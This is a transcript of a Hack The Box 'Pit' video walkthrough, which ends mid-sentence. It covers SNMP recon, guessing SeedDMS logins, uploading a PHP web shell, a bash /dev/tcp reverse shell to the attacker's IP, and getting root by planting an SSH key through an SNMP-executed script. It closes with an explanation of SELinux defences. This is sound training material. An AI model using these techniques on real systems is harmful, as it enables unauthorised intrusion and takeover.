HackTheBox - Pit

Captions
What's going on YouTube, this is IppSec. I'm doing Pit from Hack The Box, and I really like this box because of how much value it puts on recon. If you ever get stuck on the box, you go back a few steps, look at the recon you did, and it will probably paint a path forward. Too often when people have trouble I mention maybe their recon needs improvement and they're just thinking "no, my recon is good, I know how to run nmap, I know how to run gobuster", but they don't understand how to look for the subtle things, and this box really shows you that. Because you run just your basic things, you get access to two web servers, you can't really do too much, you find some paths in SNMP that leak a directory that you can use on a web server to get access to the SeedDMS application. With that, once you log in, you notice the changelog says it's running a version, and comparing the version against searchsploit it shouldn't be vulnerable, but you look at the changelog to find out how they patched it, and they patched it with .htaccess, and looking at nmap it says it's running nginx. So if you still run through the exploit manually you can pop the server. Once you get a shell on the box, you're looking around and you see oh, this is running SELinux, because all the directories have this little period at the end of the permissions, which is an indicator of SELinux, which does become handy in this box. Additionally, we'll go over SELinux at the very, very end. But you're having trouble privesc-ing, you go back to the SNMP output, notice something weird, that it's executing a program, look at that program, you can get execution through SNMP and pop the box.

So with all that being said, let's just jump in. As always we begin with nmap, so -sC for default scripts, -sV to enumerate versions, -oA to output all formats into the nmap directory and call it pit, and then the IP address of 10.10.10.241. This can take some time to run, so I've already ran it. Looking at the results we have just three ports open, the first one being SSH on
port 22, and its banner tells us it's OpenSSH 8.0. Now this is a little bit weird; normally I'm used to seeing some type of like 4ubuntu0.3 or 2 or something like that, but we just see OpenSSH. It's very similar to like the banner we did on a box a long time ago like CrossFit 2. We look at that one, which was a BSD box, and we can see this is just saying OpenSSH 8.4, so these banners are very similar. This turns out to be a Red Hat box, that we'll find out eventually, but I'm just pointing out the type of recon you can kind of do on things like this. And even like a Debian default banner, if we look at, I think Delivery I did in Debian, this says Debian 10 deb u2. So right now we just know it's probably not Ubuntu or Debian based upon that banner, and thinking maybe BSD, CentOS, Red Hat. I don't have a CentOS box off the top of my head to compare the banner with, but yeah, that's what I'm thinking right now.

Then we have HTTP on port 80 and it's running nginx 1.14.1, and we don't really see too much else. We have 9090 open; this looks like it is going to be HTTP as well because we can see these banners. Scrolling down we don't have anything else. So one thing that we should be doing that I don't show in my videos enough is a UDP port scan, so I'm gonna do -sU on 10.10.10.241, and we can do -oA nmap/pit-udp. Yeah, that should work. So let's go over to port 80.
So 10.10.10.241, and we get "Welcome to nginx on Red Hat Enterprise", so this tells us we are definitely running on Red Hat. We could take a look at that other port, so port 9090. Let's do 9090; it redirects us to HTTPS, and we should always look at certificates when it does. We get a DNS name of dms-pit.htb, so let's make sure we resolve to that, so sudo vi /etc/hosts and then 10.10.10.241 dms-pit.htb, and that is it. That is also in the nmap scan, so if we do less nmap/pit.nmap, look all the way down here, we can see certificate common name dms-pit. So let's take a look at what this page is, and we have pit.htb. This is running CentOS, so it is not Red Hat; Red Hat is like the commercial version of CentOS, CentOS is just an open source fork. So it's always kind of weird when you look at things and things conflict, but nginx, they just didn't change the banner. Here on 9090 is definitely going to be CentOS, or "centers", I don't know which pronunciation is correct. But trying to figure out exactly what this application is, we have a window, Cockpit, and I think Red Hat or CentOS has Cockpit, so let's do "centos cockpit", go to Google, and I can see what this is. It is definitely a project, and we could read more into this, but we'll just find out eventually exactly what this is. But this is the type of recon I would be doing on the box to understand. There's an application that's very similar to that, for the life of me I can't remember, I think it runs on port ten thousand. Oh, it's Webmin, w-e-b-m-i-n, is what Cockpit is very similar to. So we kind of know what's here; we need credentials to log in. We could go for googling like "cockpit default credentials", but it uses the credentials that are on the system, so it doesn't really have any default. As I say that, I am wrong, so we can try this: Simon generates the default password of admin123!, so we could always try logging in with admin and admin123!, but we get wrong username and password. It is telling us the
server is pit.htb, so let's also add that into our hosts file, so go over here, pit.htb, save it. We can see that UDP scan is still running, so these do take a long time to run; that's why I don't show it every video, because it's rarely useful, but when it is useful it is extremely useful, so always have some type of recon running in the background, you never know when it'll come in handy. So right now we just have "Welcome to nginx", so I'm going to try each of the names, so pit.htb, we also get that. We also had dmi-pit, was it dmi? Let's see, dms, dms-pit.htb, and this one returns 403 Forbidden. So we should start a gobuster on this, so gobuster -u http://dms-pit.htb, -w for wordlist, /opt/SecLists/Discovery/Web-Content/raft-small-words.txt. We don't know exactly what this is running; we could go back to just 10.10.10.241 and try index.html, index.php, ooh index.php, oh it's not found, this is just a fancy 404. If I try like going to please-subscribe we get page not found, so yeah, fancy 404 page, so we don't know the extension, so I'm not going to run it with a decent extension, and we'll output to gobuster.out. We need to specify dir mode, dir, there we go. So we have /config, it is giving us a 403; anything with a period first is looking like it is 403. Oddly enough, wp-config is 403. Is everything here? Let's try dm, what was the name, dms-pit, dms-pit.htb, 404. So if I do wp-config, I didn't do the dash there, 403.
So let's do please-subscribe, we get 404, so that is where that wp-config gives 403. Does wp-content? 404 Not Found. So there's something weird going on here that I don't know yet. wp-config is a default WordPress directory, also a default directory I believe is wp-content. We can confirm my suspicion by going to the WordPress GitHub and finding out what it is. Yeah, wp-content, oh wait, wp-config is not a directory, that's a PHP file, I think it also can be a directory sometimes. I hate doing some things live, but we have a lot of weird things that we can't understand why they're going to 404s.

Going back here, nmap still is running, it is only 43 or 45% done. One of the common things that is running on UDP is SNMP, so let's just try doing an snmpwalk, -v2c, this is the default version of SNMP on most things, -c public, this is the default password for SNMP, it's a community string, not a password, but they operate kind of the same way, so we do 10.10.10.241, and when we crawl it we get data back. So what I'm going to do is we'll use tee to save it to snmp.output and just let this crawl. It'll probably take three to four minutes for it to run, so I'm just going to pause the video and we'll come back to it once all this output is done. I probably would be poking at like more gobusting, maybe setting up to do a virtual host bust since we have multiple virtual hosts in play already, but for the sake of the video we're just going to let SNMP run.

So the SNMP scan has finished, and right off the bat I see some really interesting things here. All this like SELinux stuff, memory usage, it's outputting things I'm not used to seeing in SNMP; like this is the full output of a command. It looks like it doesn't have this SNMP MIB, is that what I think that is called? But all those numbers before is just weird. If we scroll up enough we can see /usr/bin/monitor, and that's not a default program, so this is definitely odd. I'm gonna just look at the output, and we could just less it like this, but
well, here's a good example. If we go to the bottom, I really just hate viewing things that are like multi-, with line wrapping I guess I should say, so how I'm going to view this is with less -S, and then we can just view it so everything is on one line and kind of get to what is interesting to us. Looks like we have auditd running with some things. We have PHP right here, so we know the server is PHP; I should probably go back and change my gobuster to having the php extension just by seeing that. We keep going down, we have more text over here, just kind of glancing at the text that SNMP gives us. I don't know exactly what this is from, it kind of looks like sendmail or something with a bunch of arguments, but just going down viewing all the SNMP information, this is where it gets weird. So we can also just grep things out of SNMP, so if we grep like html out of snmp, that's a good one to do, we can see it gives us /var/www/html/seeddms51x/seeddms. So I'm thinking right now this is a virtual host, so I'm going to try just going into the seeddms folder, and we can go here and say seeddms, we get 404 Not Found. I'm also going to try putting this as the folder, so if I put this we get a 403 Forbidden, and it actually added a slash for me. Did it add a slash for me when I did wp-config? It does not. So that's another small thing you can do when enumerating is notice those super, super, super subtle things. So if I do curl -i -v, was it dms-pit.htb, this should be 403 Forbidden, so we do wp-config, we get 403 Forbidden. If I do, oh shoot, what was it, let's go back here, seeddms51x, it's probably gonna send me a 403 or 301 redirect. Yep, there we go, we get a 301 redirect, and that redirects us to the directory with a slash before giving us the 404, or not 404, the 403 Access Denied. So this is good knowledge to know, and just small bits of recon that I think a lot of people just undervalue is just noticing these small subtleties. Like we went down this path, it's super
obvious now that I'm doing it in the command line looking at headers, but just being able to notice it like this, and oh wait, I didn't put that slash there, the computer did that for me; that's something that just kind of takes experience, and something you should always be looking at: how do applications behave differently when I do certain things.

So let's try going into the seeddms directory, and in here we can see we get a whole application. So knowing this exists, the very first thing I would do is probably Google to see if this is open source, so we can just Google like "github seeddms". We can see there is a GitHub project of it; we got index.php, requirements, it's a web-based... should probably read all this to understand the application, but right now I just want to identify if this is actually the correct thing. So I wonder if there's a readme.ubuntu on this box, seeddms, if we do readme.ubuntu, 404 Not Found, and here Not Found, let's try it in this directory. So maybe this isn't the right application, or the readme is just not there. See, is there anything that makes sense here? We got out, and whoops, this tab, we are in out and then out.Login.php. That looks pretty unique, and this is kind of how they are doing things, so this definitely looks like the application. We can look at the issues, and it says readme.htb on readme.ubuntu. I don't understand that, but whenever you enter some type of issue it helps to say what the issue is other than just "I have problems". We don't have anything closed, no pulls, so this is definitely weird. See if there's anything else; does this application have a website? So we just Google seeddms, maybe GitHub's not the place. We do have a website, so let's see if there's anything interesting here: website is PHP, features, demos, support, we got a changelog, and we have version information. So based upon seeing seeddms51 I'm gonna guess that is version 5.1, so we're on 5.1.x; looks like it goes up to 6.0. We can download this and see if there's anything
that would say the various versions. It is hosted on SourceForge, not GitHub. See, where do I download it, 5.1, "get will be updated regularly". See, let's just go to SourceForge and see if there's a release; it looks like there is, so 5.1.21, this is the closest thing we have, and this could tell us some files. So let's get out of that, mv Downloads/seeddms, tar zxvf on that file, 5.1.x, that is looking good. find . | grep -i change, and let's see, we have a changelog right here, but it's going into this folder which I don't think would exist. I wonder if we can specify like versions here; let's see if www exists or conf exists. If those exist then I am going to play with that to enumerate the version. So www, see, I'm actually going to use curl, so www, what does this do? Moved Permanently to /. If I do ww we get 404 Not Found, so we do have potentially a way to enumerate versions as long as that directory exists. So what was it, seeddms-5, so seeddms-51, and we can say 1, 404 Not Found, 2, 2.
So at this point I'm probably going to switch to wfuzz -u, and we'll say this is FUZZ, and the reason why I'm using wfuzz is because it has this range option; I don't think ffuf does, but this should let me fuzz 5.1 and all numbers. Let's see, "out of range", -u http like that, let's see, oh it's 1-22, I always screw that up, I think like min,max but it's range,min-max. There we go, and let's see, we get 404 for everything, yeah we do, so I'm guessing we can't enumerate the version this way, but that is definitely something I would be playing with when doing this box. So let's see that is doing it correctly, let me just get rid of those single quotes, but I can't imagine that doing anything; everything is 404. Okay, so that looks like a rabbit hole.

The next thing I'd probably do is try looking for default credentials, so we do "seeddms default credentials", and I'd also, whoops, run like searchsploit. So here we go, admin/admin doesn't work. We can do searchsploit seeddms and we can see scripting for up to 1.18, but we don't really have a way to perform cross-site scripting because we don't have anything we can send. We could just look at it, and by send I mean like we don't have a comment field, something for someone to interact with. Let's see, reference source, and see just how it is for sanity, published, where is it discovered, it's in post add event, so unauthenticated users probably can't add event, so I'm just going to ignore that. We can look at like the remote command execution and see what this is; it doesn't say unauthenticated, so I'm guessing, yeah, we can't really do that much with it. We're uploading, so we're logging in, add document and upload a backdoor, and this is for versions less than 5.1.11, but we need a way to authenticate. So what I generally do is build a brute force script for this real quick, so let's do cd .., let's vi login.py. I'm going to definitely need to import requests, and I have not done this before, so hopefully it
works. If I was doing this as a like actual thing I'd probably install SeedDMS locally so I know I have credentials that work, but I'm going to treat this like I don't have access to the source code and I have to do it blindly. So I'm sending a POST, I don't have a cross-site request forgery token, so that is a positive, and it's sending me back to login.php. So what I'm going to do is automate logging in in Python, checking the Location, and if it doesn't redirect me to login.php I report something. So let's do this: we can say requests.post, http, what is it, dms-pit.htb/ all of this, okay, and we also need to set the data, so data is equal to login: username, and then the password is going to be pwd, and then we just set lang to nothing like that. I'm going to create this as a function, so we'll call this def login(username, password), okay, see here we can say data=data, and we want to print the header, so I'm just going to import pdb, pdb.set_trace(), I think it's set_trace. python3 login.py, actually can't do that yet, we can say login("test", "test"), python3 login.py, okay, so we have now debugged the application, which means we can do r, r.text, wait, is that what I called it? r = requests.post, oh I think I know what it did, r is probably an actual like command in pdb, so if I do dir(r), we want headers, so we can print r.headers. Let's see, don't see Location, so we get the Server header, so this is definitely the response. So we go Server, Date, Content-Type, Server, Date, Content-Type, Connection: close, Powered-By, Location; this is different, the chunked, keep-alive, Powered-By, and that's not right. print(r.status_code), 200, it's a 30-something, we're probably redirecting, following redirects. So by default the requests module will follow a redirect; if we change it to allow_redirects=False, we should be able to print r.headers, and this looks better, we have this Location. So let's see, how do we get a header? Let's go here, Google "requests python get header", I
have to specify Google, "using headers with this .get, s.headers.get or update", I want, there's a .get. print(r.headers.get), oh, this is actually a dict, we can probably just do ['Location']. I should have read the object type better before going to Google, but yeah, it being in these weird brackets, yeah, it told me. So we can say if login.php is in location, we can say incorrect; we can look for this string, this entire string actually, okay. So if r.headers['Location'] is equal to the string, return False, else return True. We can say if login: print success. So we run this, we don't print success, I can say if not login, and yep, it's good. So we have logic checking if we have a valid login. The next thing I want to do is just import sys, and we'll do argv, so here print(sys.argv), I think 1 will get username, so python3 login.py ipsec, yes, yep, we only want that. So here what I would generally do is come up with a handful of passwords and try logging in with them, so let's say passwords is equal to sys.argv[1], so that's testing the use-same-username-as-password, then we can say Summer2021!, Winter2021!, Password1!, we can create a quick password list this way, and we can say for password in passwords, and then do this login. There's probably like a fancy lambda function I can do to do this all in one line, but I'm lazy and like simple code, so that's how I'm doing it. So we can say password and sys.argv[1]; probably should say like user = sys.argv[1] to clean up the code, to make it easier to read what we're doing, user. If I python3 login.py root, it's going to try a few logins, we don't get any successes, so we can just keep going down the train.

Now there is normally usernames in the SNMP output, so let's check that, so snmp.output, and see if there's any usernames. Linux pit, root, these are all INTEGERs, so I'm going to remove anything with INTEGER because that is not needed, and I'm going to use vim actually, so we can say vim, so I can just do probably /
INTEGER/d, %/INTEGER, i-n-t-e-g-e-r, d. That deleted everything; let's try :g/INTEGER/d, that's looking better, so we removed 600 lines. Okay, so we can just keep going through to see if we see like usernames. We could try like /user, /i, oh wait, we may have something here: SELinux, systems, user, these are groups, like we have root, staff, user_u, xguest. Right here we have a username, michelle, so we can try michelle. I'm not going to save that, I can just grep -i snmp.output, yeah, michelle, like this, nope, we do michelle at the start, and she only exists in that one location. The reason why I did this is to kind of be thorough, so just because I found one username doesn't mean users aren't in the SNMP output in other places, so I was just kind of checking like if she exists in another place that other users may be there, but doesn't look like this case. So let's do the Python again with michelle, and we get a success, but my bad coding doesn't tell me the password, typical me, so let's print password. So her password is one of these, login, and her password is michelle. So we can try logging in with michelle and see what this gets us.

We have now logged in, so we have an upgrade note right here, so if we look at this we have "Dear colleagues, based upon a security issue in the previously installed version 5.1.10 I upgraded SeedDMS to version 5.1.15, see attached changelog for information". So we already kind of have this changelog, but might as well just use the one they've attached; because we downloaded the whole application, that's why we have it. cp Downloads/ changelog, I think this is it, yep, this is SeedDMS. The other thing to keep a note of is if we do searchsploit for SeedDMS, it's only going up to 5.1.11, and the changelog specifies it is 5.1.15, so we're in a higher version. If we look at the changes to 5.1.11, let's see, we have remote command execution through unvalidated file upload, "add .htaccess file to the data directory", and this
is interesting, and why I called this at the beginning of the video like OSCP-like, because in my mind the OSCP exam when I took it was all about doing good recon, and if you go back to the recon here there's one key piece of information that a lot of people kind of just skip over: this is an nginx server, nginx doesn't do .htaccess. I wonder if we can find a post real quick; that's interesting, "nginx .htaccess", let's see, does this pull it up, examples, how can I use, no wait, wait a second, it's the first result. I'm used to this being an ad so my eyes just ignore it, but yeah, I just found this page funny, like "Apache .htaccess, you can't do this, you shouldn't, and if you need .htaccess you're probably doing it wrong", which is kind of a clue that this patch is doing it wrong by just using .htaccess to try to prevent an exploit. So we can try to test this still, so let's just run through the exploit even though it says it's patched. So searchsploit seeddms, so let's go through here, see, searchsploit -x, so we have to log in and then add a document, so this is what we have to do. So let's go back to DMS and find out how we can add a document. Well, there's a docs directory, so let's go here; don't see anything different, I'm looking for like an upload or create, or this action button not to be blocked out, so I'm gonna go to users. We have two, we have jack and michelle; michelle actually has actions she can do. I'm not going to delete it, I think that X is delete, so once we go into this we can add document. So let's add something, we call it please subscribe, and then if we scroll down we can add a local file. So I'm going to create a quick shell, and this backdoor is actually probably something you should be using. The main reason why I say that is normally in my videos how I do backdoors I just do like PHP with $_REQUEST['cmd'], like this, but if you don't set this parameter then the web server is going to error out. We can just do this real quick, php -S 127.0.0.1, I think that's
all I need, let's do port 8000, so if I curl localhost:8000/test.php we can see it is Not Found; wait, I wrote show.php, and well, wrong file name. The PHP web server is actually not giving me errors out here, but in a lot of web servers, if error messages are displayed, this would go to the user, and this "undefined index cmd" would tell them the command that they need to abuse your web shell. So what the searchsploit one is doing is checking if this parameter exists first and then running the command, and why this is good is because if you wanted to like be secure and not let other people use your web shells, you would do this and then change cmd to be something that someone would never guess. As long as they don't think it's me exploiting the box, I doubt they would guess please-subscribe as a parameter. But yeah, so that's what we do. This echo <pre>, all this is doing is like making the HTML look pretty; if you don't have this then everything's probably gonna be on one line, because by default HTML line breaks by like <br>, like that; that <pre> tag will make line breaks also work with just a normal line break. So a decent web shell, I would recommend using that other than just a one-liner you type up haphazardly. So let's go to browse, we can do htb/pit and then the file shell.php, and we can add the document, so we can see please subscribe exists. If we go back to the web shell, the searchsploit one, we can see how to use it, and this is a little bit unintuitive: they have a directory, they say go to example.com/data/1048576, and that's actually a default directory, so you just want this to exist, well, you don't want it to exist, you just don't have to overthink this. If I was just looking at this payload I would think this is some weird like date that documents get uploaded, or some type of ID, but the document ID comes on after, and then 1.php. So all we need to know is the document ID; if I go to download this, in the bottom left hand corner I can see documentid=30.
So I think we have everything we need to make this payload work; the only thing is we have to know where this data directory is. So I'm just going to go to out/data, see if this exists, 404 Not Found; remove out, seeddms/data, 404 Not Found; let's go up one more directory, and we get 403 Forbidden, so chances are that directory exists. Let's try this, 1048576, 403 Forbidden, and the key thing also is it is adding that slash for us, so we got a redirect because it existed and then we went to Forbidden. Then the last thing is document ID, we said that was 30, so let's do 30/1.php, we get nothing; if I say please-subscribe=id, boom, command. So let's try getting a reverse shell, sending it over to Burp Suite, let's intercept on, send, go to Repeater, let's change the request method so we put everything in the POST: bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1', like that, and then Ctrl+U to URL encode it, and nc -lvnp 9001, click send, and it comes back right away. We don't have a shell, so something is weird; maybe we mistyped this command, or maybe like something exists on this box. Based upon the SNMP output it did end with like SELinux stuff, so if I cat snmp.out we should see these are SELinux things, so probably right above it we do have SELinux. However, if blocking reverse shells, SELinux probably isn't the first jump I would do, I would be thinking like iptables, so I do ls -la on /etc, because generally iptables saves in a directory like /etc/iptables or something, and whoops, one thing I really notice is there's a period after every permission, and this is also an indication of SELinux. So if I just do like ls -la we don't have that period; we do it here, so again a small little recon tip, noticing that period, like oh, maybe it's SELinux. We can search for like iptables, we don't really have anything, so my next step is, well, we're www-data, or not www-data, nginx. I can cat /etc/passwd and look for nginx because I want to try to get like actual shell access to this server;
it's /sbin/nologin, so if I dropped an SSH key it does me no good because I can't log in. So my next bet is to look for password reuse type thing, and the best way to get a password is to look in the web service config to see how it accesses the database. I'm doing pwd so I can see my path is here; I probably want to go into the seeddms51x directory, so I go up three directories. So if I do ls ../../../ we can see a config, so let's go there, and we have settings.xml, so let's do settings.xml, do cat, and here we go, we have SeedDMS. So I can look for password, we have 19 matches, lots in comments; database, nine comments, or nine matches; let's try typing my database names, like mysql, one match, so this is probably where I'm gonna start. Database name is localhost, db database user and db password, so we can check this password. So I'm going to do cat /etc/passwd, let's make sure I saved that password, oh, is it the wrong, click copy it, let's do Ctrl+Shift and, uh yeah, Ctrl+Shift+Insert, there's two clipboards on Linux, I always choose the wrong one for some reason, but we just have the pw there. So what was I gonna do? We are looking at a web shell in Burp; I'm going to cat /etc/passwd again, and I'm just looking for users, so we have rng, cockpit, I probably just want to grab all this honestly and grep for sh. So vi temp, grep 'sh$' on temp, so it ends with sh, pretty much only two users, root and michelle. So I'm going to try ssh michelle@10.10.10.241, and we get permission denied, it only accepts public key. So let's try the other service we have access to, which is Cockpit, so 10.10.10.241 port 9090, and let's access this CentOS Linux, michelle, password, oh, that's not it, let's cat pw. This is why it's always handy to save the password. If I was doing this like not recording I would probably use Obsidian or something to take notes as I go, but that adds like 20 minutes to each video of taking proper notes, so you can just search ippsec.rocks for Obsidian
and probably find a few videos of me using it. So we're in this web application, we can do SELinux and try turning it off, oh, error, can't. So let's go over to Terminal, and this is weird, ls, well, it looks like it's working but we get a bunch of junk. I'm gonna click reset, nothing happens; let's change the appearance, it wants HTML5 canvas image data, let's allow this, and then when we change everything works, so it just was a weird browser thing blocking access. So let's do ls -la, and we have a shell on this box. While I'm here, cd .ssh, I'm going to see if we add in an SSH key if it will work. The main reason I'm doing that is because something's blocking the reverse shells, so I want a reliable way I can get onto the server; SSH keys are pretty reliable. So let's do ssh-keygen -f, I'll call this pit, put no passphrase on it, chmod 600 pit, and then let's cat pit.pub, and we'll copy this into her .ssh directory, so echo this to authorized_keys. Okay, ssh -i pit michelle@10.10.10.241, and that does not work; I expected it to. Let's do chmod 600 authorized_keys, see, "unspecified GSS failure", well, that's probably always there. cat authorized_keys, it is there, michelle owns it, a-u-t-h-o-r-i-z-e-d_keys, this is weird. I'm probably doing something really ridiculous; ls -la on pit, cat pit, that is the private key, m-i-c-h-e-l-l-e, m-i-c-h-e-l-l-e, huh. So what I'm going to try doing is let's copy pit.pub to .ssh/authorized_keys, we can say ssh -i pit ipsec@localhost and see if it lets me log in here; it does, and if I remove that authorized_keys it doesn't, so my authorized_keys file is correct. Let's md5sum it real quick, pit.pub, 39733, md5sum authorized_keys, same exact file, so maybe this user just doesn't have SSH access, which is weird. cat /etc/ssh/sshd_config, can't access it, let's see, ls -la on /etc/ssh/sshd_config, and we can see .rpmnew, so this is slightly different than what is there, so maybe this user just doesn't have SSH access, or I've screwed something up
hilariously that I'm going to hate myself when I read comments, but we can do everything here from this prompt. The key piece of information now is thinking back to snmp.out, and if we look at this, let's go G, right where I said it's weird, we have this /usr/bin/monitor, and what's happening here is it's executing this script and putting a bunch of information down below. I wonder if this is a known MIB; it is like an execute MIB, let's just Google this, and we'll probably come up with some spoilers of the machine, but hopefully we come up with legitimate documentation. Okay, we can just ignore that. So I don't know what this MIB's name is called; I don't know SNMP well enough to figure out how to trace this, I just know I see a binary and then random data. I'm going to go over here and look at that binary, so let's do cd /usr/bin and file monitor; it is a bash script, so we can less monitor and see what it does. It says for script in /usr/local/monitoring/check*.sh; do /bin/bash $script. So let's try writing something in there; we can say echo, wait, what is it, /usr/local/monitoring, copy, echo, let's do echo "please subscribe" to /usr/local/monitoring/check1.sh, I think it's check*.sh, so we just have to write something, and then I can run this snmpwalk again. So do I have it here, snmpwalk -v2c -c public 10.10.10.241, and we'll just let that run. And the one thing about this that I did not mention is a lot of people may just ignore this and like run into a brick wall, because if I do ls -la on that directory we get permission denied. If I do ls -la /usr/local and grep for monitoring, spelled it wrong, we can see we don't have access, root root and then no one, but we have a plus, and plus means there's extended permissions, so we can say, I think, getfacl /usr/local/monitoring, and we can see michelle actually has write, execute. So the extended permission of this is just so you can grant individual users, because originally it's like owner, group, everyone else, and it doesn't have a bit to set
it specific for users, so the extended attributes let you do that. So we can see michelle can write and execute, but she can't actually read from it; but you can write in it. And it's funny, because if I do two direction signs (>>), I'm probably going to get a failure, because by default this looks at the file and then appends to it, and because it can't look for the file, or it can't read the file, it can't append, so we get permission denied. This snmpwalk is still running, so I'm just going to wait for it to finish, so we'll pause the video and see exactly what happens.

Okay, so the snmpwalk is done, and we go up to the top and we can see it just says "please subscribe". It doesn't have the echo here, so I know it actually executed our code. If it said "echo please subscribe", I'd be like, oh, it just outputs the contents of the file, but because it doesn't have echo, I know it executed something. And the reason why I chose echo and not id or something is because I have a lot of information about things running, and with id I may be like, oh, was that there before, is that mine? So that's why I chose echo and did a unique string, and I didn't go for a reverse shell or something like that off the bat, because when you're enumerating exploits you want to keep it simple, because if you start complex, make it complex and it fails, you don't know if it failed because of a hundred reasons, because it was complex, or just something simple like the exploit didn't work.

So now that we know that works, we can go back here, and let's try sending our SSH key there. So I'm going to try this SSH key thing again: echo, and we need to... let's see, where is my SSH key, ls, cat pit.pub, so we can copy this. So echo that to /root/.ssh/authorized_keys. I wonder if michelle... I said key, and this is keys; that'll be hilarious. Just redirect it to check1.sh, that should be fine. Run this snmpwalk again, and we've got to wait for it to finish. So let's see, ls .ssh, no, I have
keys. It's going to be funny; maybe SELinux blocks our login, or, let's see, is there, like, ls /etc/ssh, a login.allow or something? I remember, I'm not sure, but we'll just wait for this thing to finish, the snmpwalk to finish.

Now that the snmpwalk is finished, we can try it again, and we get in. So from here we can just read root.txt, and that will pretty much be the box, but not the end of the video. There are a few things I wanted to mention, the first one being: if that SNMP thing doesn't work, try it again. The one thing I probably would change about this is every five minutes it creates this cleanup script, and if you look at the cleanup script, it's just going to be removing all the scripts in /usr/local/monitoring. What I would have probably changed about this box is just make sure it only deletes files after they exist for five minutes, because it takes me like three minutes to run the snmpwalk, so around half the time you're probably going to lose that race condition, just as a coincidence of: you create that file to get executed, the cron goes and cleans up the directory, and by the time the snmpwalk gets to your script, it just doesn't work. So bear that in mind when you're doing this box.

But the last thing I want to talk about is SELinux, because it's probably one of the most important security features in Linux, but the first step of installing Linux for most people is just disabling it altogether, because it can break things and people get scared when things break. So what is SELinux? Well, it's a mandatory access control system. But what's that mean exactly? Remember earlier in the box where we talked about the extended file permissions that allowed michelle to specifically write to that directory and no one else. Now imagine that for every action on the server; we're not just talking about writes, we're talking about binding to a socket, connecting to a network port, reading a specific file. And it's not even every action, like all those actions for users; it's also a
label of, like, the application that's running for that user. So there's a lot of things. So if, like, SNMP is running as root but it's got the SNMP label, it still doesn't allow you to do everything that root can do. As you can imagine, that breaks a ton of crap. Thankfully, we don't really manually configure SELinux nowadays; you just use, like, setenforce to turn it into permissive mode. So setenforce 0, I guess, to turn it into permissive, or 1 to turn it into enforcing. When it's in permissive, all it does is say, like, this would have been blocked, but it's in permissive mode so we allowed it. And even if you don't plan on ever enabling SELinux, that's still a super handy thing to have, so you don't want to disable it, because if someone does a web shell, like if they hack your server and they send a web shell, if you have SELinux in permissive mode there's a high chance that a log is going to be generated that says, hey, this web server connected to the network, but you're in permissive mode, so we just let it be. The main way to just allow things is just running, like, audit2allow, and it's going to look over your SELinux log; you look over each thing, like, yep, I accept that, I'm going to cat it to the output. But this doesn't really make for good learning opportunities, and man, it can take a while. So while that runs, let's get another SSH session to this box: ssh -i pit 10.10.10.241.
Because I want to... oh, I have to specify root. To, like, explain what these rules are and demonstrate SELinux, just hitting the auto-approve button to make SELinux work isn't that great for a demo. So let's go up here, and we can say... actually, go to the reverse shell. So let's do this, which I believe will be blocked. I think we have to do document 33 now; does that exist? It does. Okay, so I'm going to set it to port 9001, and I'm going to nc -lvnp on my localhost on 9001. We're going to run this, and we don't get a reverse shell; nothing happens here.

So what I want to do is look at that audit.log file. So let's grep denied on /var/log/audit/audit.log, and near the bottom this message keeps getting generated; it's a D-Bus one, we're going to always ignore this. But we see this one, AVC, that's Access Vector Cache, I want to say, but it's a name_connect. So let's grep name_connect, tail -1, so this is the log line for this event. It's telling us the PID; if we look at that, this is probably going to be Apache. Let's see, ps -ef and grep this. Nope, that's the process that was either the Apache thread or what bash would have been, but bash is trying to connect to 9001, and we get a bunch of SELinux gibberish: tcp_socket and permissive=0. So permissive is not on, so it blocked it. If we had permissive on, this would be permissive=1 and it would not have blocked. But that's not really human readable, so if we do audit2why, which is an SELinux program, it will convert this log into something we can read. So "avc: denied { name_connect }", what was caused: the httpd_can_network_connect boolean was set incorrectly; we have to enable this to have httpd be able to connect to the network. And you may be thinking, this is a web server, it always connects to the network. Well, no: it binds a socket to the network, and things connect to it and it talks back; you rarely have httpd reaching out. There are cases where you'd have httpd reaching out to, like, a database, and you can also set that as well. So setsebool and
then we're going to do -P (capital P) for the policy, httpd_can_network_connect. And there's a specific one for various things; there is db. If we want to look at them, that's going to error out because I didn't say 1, but we can do getsebool -a and we can see all these things. If I look at http... let's see, that's not that, mysql... we have bunches of things that httpd can do. So we can say, like, it can connect to FTP, it can connect to LDAP, MythTV, that's a funny one; that's like the precursor to XBMC, or maybe that's after XBMC, Xbox Media Center, and then that kind of turned into Plex, I guess. But we've got Zabbix, which is kind of like Nagios, just can't connect in general, can connect to DBs. So you have a lot of these things. So if I just enabled can connect to db, so that has now enabled... man, that audit2allow is still running. We go, doesn't work, but if I do nc -lvnp 3306 and specify we want to go on port 3306, boom, reverse shell, because we allowed httpd to connect out to databases, which is on port 3306. So if you want to do, like, good defense in depth, this is an amazing addition to a host-based firewall. To prove that this wasn't iptables, I guess I can just do nc 3306, and we can set this bool to zero to turn it off, and now when I click send we no longer get that reverse shell. So that's pretty awesome.

The other thing it will do is prevent binding to sockets, and it can do this mainly because of specific rules that allow httpd to only bind to http sockets. So if I do nc -lvnp 9001, we send this, and we're going to do pretty much the same thing. So where's this grep; we're going to grep denied. We're not going to look at name_connect because we don't know exactly what the error message is: it is name_bind. So if I do my same thing with audit2why, instead of name_connect we do bind, run audit2why, and it's just telling us it's missing the type enforcement rule. If we look at this, it is using the context, or the target context, it's trying to access tor port, and by default httpd only has access
to http_port. If we pipe this over to audit2allow, we can see the entry it would write to the config to allow us to do that: allow httpd access to the tor port, tcp_socket name_bind. So if someone tried to use the tor port with UDP, it would fail, because we're only allowing TCP. It's like the principle of least privilege, and if there's no allow statement, the default thing in SELinux is deny. So we can use, like, semanage port -l, and this is going to list what each port is. Like, if I look at 443, we can see that's... well, pki. Let's go up; here's all the http ports. So if I try binding... maybe if I bind on 9000 it will actually work. Let's try that; let's do, like, 9000 or 8443. Oh, it would work, because that is a default port for Linux. So nc 10.10.10.241 9000... 10.10.10.24... no route to host. netcat, do I specify -p? But that's a source port, right? ping 10.10.10.241, okay, port 80. So I can't bind to port 80 because I'm not using sudo. Okay, I can do a GET request. 9000, no route to host, that's weird. I'm going to try 8443. I was expecting it to say, like, just couldn't connect. 8443, I wonder if there's something in SELinux blocking it, but I don't think so. nc -lvnp, nope, that's right. I don't know why it's taking so long, so maybe something else is at play here. So let's do this, and I guess the curse of the demo gods; I was not prepared to go into this. We don't see anything blocking us on 8443; we still have the last denied as this 9001 source. iptables -L, nothing there. I'm actually baffled at what is happening here. See, let's curl... -lvnp 8443. When I do this it's now taking a long time. Let's do 9000, id, okay, my command shell still works. Let's see, so -zv, done. I don't know what's going on, but we'll move on. We could have added a port to that; if we look at the tor ports 